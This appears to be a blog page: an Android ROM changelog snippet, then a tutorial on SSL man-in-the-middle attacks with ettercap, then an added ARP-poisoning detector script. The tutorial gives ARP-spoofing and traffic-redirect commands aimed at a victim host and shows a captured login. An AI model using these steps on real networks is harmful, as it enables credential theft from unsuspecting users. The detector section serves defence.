- Brought back the option to include Milestone MediaGallery and PhotoEditor
- Option to install Wifi Tether from the ROM Installation... no extra download necessary. (same version as before)
- Option to install the Audio Toggle App
- Option to install the Low Brightness App
- Option to install Droid Font


...

Also, check this out.. renowned rom maker Cyanogen has a 2.1 rom working on the Droid.

http://alldroid.org/viewtopic.php?f=328&t=2260

Anyone have info on it? I'm sure I will try it out before long.

SSL Man In The Middle with Ettercap

Playing a bit more with ettercap, this time around we'll look at enabling SSL Man in the Middle attacks so that we can retrieve data from encrypted connections as well as clear-text ones.

The attacker's machine is running Ubuntu 9.10, and the victims tested were both Ubuntu and Windows 7.

Edit /etc/etter.conf and set both the user and group id to 0. This is dangerous if someone has a method for counter-attacking ettercap, but it lets ettercap set iptables rules in order to forward ports for breaking SSL connections and substituting certificates. Those iptables rules are already in etter.conf and just need to be uncommented:

redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

You may also need to enable network forwarding:

#echo 1 > /proc/sys/net/ipv4/ip_forward

To get away from the noisy method used previously, it's best to just pick on one host at a time; a quiet nmap of the network should give you an idea of which IP addresses on the network will make a good target, Windows desktops being the best option obviously.

All you need to do is fire up ettercap like before, but use an extra remote tag and plug in your victim's IP address. I chose .24, a Windows 7 machine.

#ettercap -Tqi wlan0 -M arp:remote /192.168.168.168/ /192.168.168.24/

This is where the attacker depends on user ignorance and/or impatience: when the victim tries to visit a site that uses SSL to encrypt the connection, they will receive a giant warning screen telling them that something is wrong... which most users promptly ignore...

By accepting the invalid certificate which ettercap has provided them, the attacker's machine now sees in cleartext all of the data that should have been encrypted. Furthermore, when ettercap sniffs a login packet, it immediately displays the contents to the attacker in a nice, easy-to-read format such as this:

HTTP : 65.54.165.179:443 -> USER: [removed]@hotmail.com  PASS: [removed] INFO: login.live.com/ppsecure/post.srf?wa=wsignin1.0&rpsnv=11&ct=1267474281&rver=6.0.5285.0&wp=MBI&wreply=http://mail.live.com/default.aspx&lc=1033&id=6485

Of course I removed the user name and password since I don't want to show them to the world, but you can try this with your own account and see them clear as day.

This attack can be particularly devastating when crafted to target services that use expired, self-signed, or otherwise problematic certificates, since those have trained their users to simply ignore the warning given by their browser; the one chance users have to stop and think twice is destroyed.
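Both ettercap posts on this page (the sslstrip one above and this SSL man-in-the-middle one) start with ARP poisoning, where the attacker's MAC is made to answer for the gateway's IP. As an added example that is not from the original posts, here is a small detector that compares snapshots of the host's ARP cache and flags an IP whose MAC changed or a MAC that claims several IPs; the `arp -n` snapshots are constructed sample input, and the gateway address, MACs and function names are my own assumptions.

```python
"""Flag ARP cache changes that look like ARP poisoning.

Added example; the snapshots are constructed sample output of `arp -n`,
not captures from the original posts' network.
"""
import re
from collections import defaultdict

# Constructed snapshots: before and after a poisoning run. The gateway's MAC
# is overwritten by the MAC already used by .13, the attacking host.
BEFORE = """\
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.168.168          ether   00:11:22:33:44:55   C                     wlan0
192.168.168.24           ether   00:aa:bb:cc:dd:ee   C                     wlan0
192.168.168.13           ether   00:de:ad:be:ef:01   C                     wlan0
"""
AFTER = """\
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.168.168          ether   00:de:ad:be:ef:01   C                     wlan0
192.168.168.24           ether   00:aa:bb:cc:dd:ee   C                     wlan0
192.168.168.13           ether   00:de:ad:be:ef:01   C                     wlan0
"""

ARP_LINE = re.compile(r"^(\d+\.\d+\.\d+\.\d+)\s+ether\s+([0-9a-f:]{17})", re.I)

def parse_arp(text):
    """Return {ip: mac} from `arp -n` output; header and incomplete entries are skipped."""
    table = {}
    for line in text.splitlines():
        m = ARP_LINE.match(line)
        if m:
            table[m.group(1)] = m.group(2).lower()
    return table

def find_anomalies(old, new, gateway):
    """Compare two snapshots and return (severity, message) poisoning indicators.

    A changed MAC on the gateway is the classic sign of the posts' attack;
    one MAC answering for several IPs is the attacker impersonating them.
    """
    findings = []
    for ip, mac in new.items():
        if ip in old and old[ip] != mac:
            severity = "CRITICAL" if ip == gateway else "WARNING"
            findings.append((severity, f"{ip} changed MAC {old[ip]} -> {mac}"))
    by_mac = defaultdict(list)
    for ip, mac in new.items():
        by_mac[mac].append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            findings.append(("WARNING",
                             f"{mac} claims {len(ips)} addresses: {', '.join(sorted(ips))}"))
    return findings

if __name__ == "__main__":
    for severity, msg in find_anomalies(parse_arp(BEFORE), parse_arp(AFTER), "192.168.168.168"):
        print(severity, msg)
```

On a live host, feed it the output of `arp -n` taken a few seconds apart; a static entry for the gateway (`arp -s <gateway-ip> <gateway-mac>`) stops the cache from being overwritten in the first place.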